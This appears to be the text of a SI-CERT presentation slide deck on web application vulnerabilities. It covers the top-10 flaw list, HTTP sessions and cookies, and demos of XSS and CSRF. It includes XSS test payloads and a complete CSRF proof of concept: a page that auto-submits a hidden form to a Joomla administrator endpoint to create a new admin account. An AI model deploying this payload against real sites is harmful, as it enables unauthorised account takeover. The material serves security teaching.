Web Application Vulnerabilities
Tadej Hren, SI-CERT (ARNES)
WEB APPLICATION
VULNERABLE APPLICATION
Top 10
• Cross Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution (RFI)
• Insecure Direct Object Reference
• Cross Site Request Forgery (CSRF)
• Information Leakage and Improper Error Handling
• Broken Authentication and Session Management
• Insecure Cryptographic Storage
• Insecure Communications
• Failure to Restrict URL Access
• ...
How does the web work?
google.com
GET /index.html
HTTP/1.x 200 OK
<html><head><title>Google</title>...
<img src="/images/logo.png"/><input type=submit value="Iskanje Google">...</html>
GET /images/logo.png
HTTP/1.x 200 OK
(binary image data of logo.png)
Anyone for a cookie?
gmail.com
POST /accounts/Login?service=mail
Email=tadej.hren&Passwd=blabla
HTTP/1.x 200 OK
Set-Cookie: SID=DQA4V8lfg4dtusv
<html><head>...
GET /mail/sendmail?service=mail
Cookie: SID=DQA4V8lfg4dtusv
HTTP/1.x 200 OK
<html><head>...
user:tadej.hren
Cookie:DQA4V8…
…
Javascript
<script>document.cookie</script>
Javascript
<script>alert("Pomembno obvestilo!")</script>
Cross Site Scripting (XSS)
Exploits the trust a user has in a website
XSS
DEMO
Cross Site Request Forgery
(CSRF)
Exploits the trust a website has in the user
CSRF
WEBSITE   BROWSER   USER
Authenticated session
X
ACTION
CSRF
DEMO
A picture?
<html><body>
<script type="text/javascript">
window.onload = function() {
var url = "http://localhost/slojoomla/administrator/index2.php";
var gid = 25;
var user = 'ub3rh4cker';
var pass = 'password';
var email = '[email protected]';
var param = {
name: user, username: user, email: email, password: pass,
password2: pass, gid: gid, block: 0, option: 'com_users',
task: 'save', sendEmail: 1
};
var form = document.createElement('form');
form.action = url; form.method = 'post';
form.target = 'hidden'; form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="clip.png"></body></html>
XSS+CSRF
Anica
Bine
Cene
Davor
Erika
Filip
Grega
Haso
Ivan
Ivan
Joži
Karmen
Luka
Mitja
Nina
Oma
Petra
Rado
Suljo
Šime
Tedi
Urbi
Vera
Zarja
Željko
VULNERABLE APPLICATION
VULNERABLE APPLICATION
Protection?
IE8
FF&NoScript
Questions?
• http://www.cert.si
• http://www.arnes.si/si-cert
• http://www.twitter.com/sicert